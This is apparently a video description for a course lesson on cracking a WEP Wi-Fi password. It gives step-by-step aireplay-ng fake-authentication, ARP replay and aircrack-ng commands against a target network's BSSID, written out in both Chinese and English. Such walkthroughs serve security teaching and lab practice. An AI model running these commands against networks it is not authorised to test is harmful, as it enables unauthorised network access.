024 ARP重放攻击破解WEP Cracking WEP with ARP Replay

Описание к видео 024 ARP重放攻击破解WEP Cracking WEP with ARP Replay

中文代码:

找到WEP密码的步骤

1. 初始化认证
在第二个屏幕中点击键盘向上键,显示以下命令:
aireplay-ng --fakeauth 0 -a [WEP目标网络的BSSID] -h [Wlan0后面的6组数字,横线改为冒号] wlan0
不按enter
拷贝该代码

2. 进行ARP重放攻击
在第三个屏幕中:
1. 输入 clear 清屏。
2. 粘贴上一步的命令,将 fakeauth 改为 arpreplay,删除 0,将 -a 改为 -b,然后运行命令。
3. 点击回车,开始ARP重放攻击。

3. 验证关联成功
在第二个屏幕中重复运行以下命令aireplay-ng --fakeauth 0 -a [WEP目标网络的BSSID] -h [Wlan0后面的6组数字,横线改为冒号] wlan0,按回车,直到看到“association successful”:


4. 破解密码
在第二个屏幕输入以下命令,运行后等待结果:
aircrack-ng [CAP文件名,例如:arpreplay-01.cap]

按回车


英文代码:

Steps to Find a WEP Password

1. Initialize Authentication
On the second screen, press the up arrow key on the keyboard to display the following command:
aireplay-ng --fakeauth 0 -a [WEP target network's BSSID] -h [The 6-digit number after "unspec" in Wlan0, replace dashes with colons] wlan0
Do not press Enter.
Copy the code.

2. Perform ARP Replay Attack
On the third screen:
1. Enter `clear` to clear the screen.
2. Paste the command from the previous step, change *fakeauth* to **arpreplay**, remove `0`, change `-a` to `-b`, and then run the command.
3. Press Enter to start the ARP replay attack.

3. Verify Successful Association
On the second screen, repeat the following command until you see "association successful":
aireplay-ng --fakeauth 0 -a [Target Network's BSSID] -h [The 6-digit number after "unspec" in Wlan0, replace dashes with colons] wlan0

4. Crack the Password
On the second screen, enter the following command and wait for the result:
aircrack-ng [CAP file name, e.g., arpreplay-01.cap]

press enter

Комментарии

Информация по комментариям в разработке